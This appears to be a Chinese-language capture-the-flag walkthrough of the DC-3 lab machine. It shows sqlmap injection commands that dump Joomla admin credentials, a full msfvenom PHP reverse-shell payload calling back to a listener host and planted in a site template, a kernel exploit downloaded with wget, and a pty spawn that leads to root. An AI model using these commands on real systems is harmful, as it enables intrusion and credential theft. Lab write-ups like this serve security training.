DC-3靶机渗透提权

目录

• 0x01 收集DC-3靶机的信息
• 0x02 获取网站管理员的用户名和密码
• 0x03 取得shell并提权
  • 3.1 上传文件获取反弹shell
  • 3.2 提权并查看flag

0x01 收集DC-3靶机的信息

利用nmap工具扫描DC-3的信息

利用msf工具扫描出对应的版本信息

0x02 获取网站管理员的用户名和密码

利用searchsploit查找针Joomla 3.7 的漏洞

查看对应的文件中的攻击方式说明

执行文件中sqlmap语句进行爆库

sqlmap -u "http://10.3.139.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

成功获取网站中的数据库

尝试获取joomladb库中的表

sqlmap -u "http://10.3.139.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

在joomladb中一共有76个表，#__uses表中应该存储了账密字段

尝试获取#__users表中的字段

sqlmap -u "http://10.3.139.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]

获取字段名过程中发现不能直接从表中取出字段，根据提示进行操作

成功获取users表中的6个字段

尝试获取字段username和password的内容

sqlmap -u "http://10.3.139.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C 'username,password' -dump -p list[fullordering]

成功获取用户名和密码的hash

利用john工具对密码进行爆破

利用niktod或joomscan对网站进行扫描，获取网站目录

访问/administrator页面，使用之前得到的用户名和密码进行登录

---

成功登录之后，点击查看系统信息，发现系统及其内核的版本

---

0x03 取得shell并提权

3.1 上传文件获取反弹shell

点击Extensions — Templates — Beez3 Details and Files

通过 ip/templates/beez3/html 可以访问该页面中文件夹的内容

利用msfvenom生成反弹shell的PHP文件

# 命令不支持补全，LHOST为开启监听主机的IP，LPORT为监听端口
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.104 LPORT=7777 R

<?php /**/ error_reporting(0); $ip = '10.10.10.104'; $port = 7777; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

将生成的代码写入网站html文件夹下的reshell.php文件

通过浏览器可以访问html这个目录

（PS: 我是在不同时间段完成提权部分和之前的爆库部分，所以IP改变了，不过不影响实验）

先在msfconsole上开启监听，再访问上传的php文件便可以成功连接

3.2 提权并查看flag

根据之前获取的系统和内核信息查找DC3的可利用漏洞，并将说明文档下载至当前目录下

查看具体用法以及效果演示

将压缩包文件下载到本地并解压

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

如果用 wget命令从GitHub下载失败时，可以往/etc/hosts文件中添加以下内容

# Github Start
52.74.223.119 github.com
192.30.253.119 gist.github.com
54.169.195.147 api.github.com
185.199.111.153 assets-cdn.github.com
151.101.76.133 raw.githubusercontent.com

之前已经建立了连接，现在将exploit.tar上传到服务器的/tmp目录下

进入目标系统的shell，利用python3调出交互式命令解释器，并将上传的压缩包进行解压

python3 -c 'import pty;pty.spawn("/bin/bash")'

运行过程会出现编译错误，忽略即可

成功取得root权限，切换到至/root目录下查看flag

更改root密码后，查看登陆DC-3靶机后的界面